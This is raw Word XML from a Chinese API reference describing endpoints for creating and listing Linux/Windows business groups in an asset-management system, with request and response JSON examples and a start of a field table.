        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name":"第一级业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description":"第一级业务组a的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "name":"第二级业务组b1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"第二级业务组b1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d3的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d4的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "name":"第二级业务组b2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"第二级业务组b2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c3的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d5的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8A8FB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B7F0F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": "success"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A30D64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果有错误，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784585DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "message": "数据结构不正确，存在name为空问题！[{\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":[{\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":[{\"name\":\"第四级业务组d1\",\"description\":\"第四级业务组d1的描述\"},{\"name\":\"第四级业务组d2\",\"description\":\"第四级业务组d1的描述\"}],\"name\":\"第三级业务组c3\",\"description\":\"第四级业务组d1\"},{\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sonGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":[{\"name\":\"第四级业务组d4\",\"description\":\"第四级业务组d4\"},{\"name\":\"第四级业务组d3\",\"description\":\"第四级业务组d3的描述\"}],\"name\":\"第三级业务组c1\",\"description\":\"第三级业务组c1的描述\"}],\"name\":\"\",\"description\":\"第二级业务组b2的描述\"},{\"sonGroup\":[{\"$ref\":\"$[0]\"},{\"sonGroup\":[{\"sonGroup\":[{\"name\":\"eeeee45\",\"description\":\"第四级目录eeeee45\"}],\"name\":\"eeeee33\",\"description\":\"第三级目录eeeee33\"}],\"name\":\"第二级业务组b1\",\"description\":\"第二级业务组b1的描述\"}],\"name\":\"\",\"description\":\"第一级业务组a的描述\"}]",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": "fail"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2DC655" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc115166155"/>
      <w:bookmarkStart w:id="162" w:name="查询所有linuxwindows业务组"/>
      <w:bookmarkEnd w:id="160"/>
      <w:r>
        <w:t>查询所有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>业务组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w14:paraId="5D1E6A57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于获取已经存在的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>（或者windows）业务组；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E28609" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773CFFD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/group/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2F4BE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037F6EFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD13E1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5848E1CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/group/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F0BA507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC6EDC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": 254,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "eeee1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>relationshipName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "eeee1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "owner": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "第一级目录"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": 255,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent": 254,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "eeeee2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>relationshipName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "eeee1/eeeee2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "owner": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "第二级目录zi"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": 256,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent": 255,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "eeeee3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>relationshipName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "eeee1/eeeee2/eeeee3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "owner": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "第三级</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zison</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": 257,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent": 256,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "eeeee44",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>relationshipName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "eeee1/eeeee2/eeeee3/eeeee44",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "owner": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "第四级目录test"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769D15C0"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925"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5694"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="44238C3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3586FF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72CB60DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F500933" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7DE0BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AD9FBE0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C65CB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EDEB5D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F1B94A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="445E25B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60145783" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47A0C021" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF78049" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E01699B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573D272A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>业务组父</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>id，parent=0,该业务组是第一层业务组，无父业</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>务</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="048657E4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="076E33F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29CBD8AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C44582A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F70BA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名（最多128个字符长度）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23B34BB3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30E679FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>relationshipName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14E255D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A041A22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
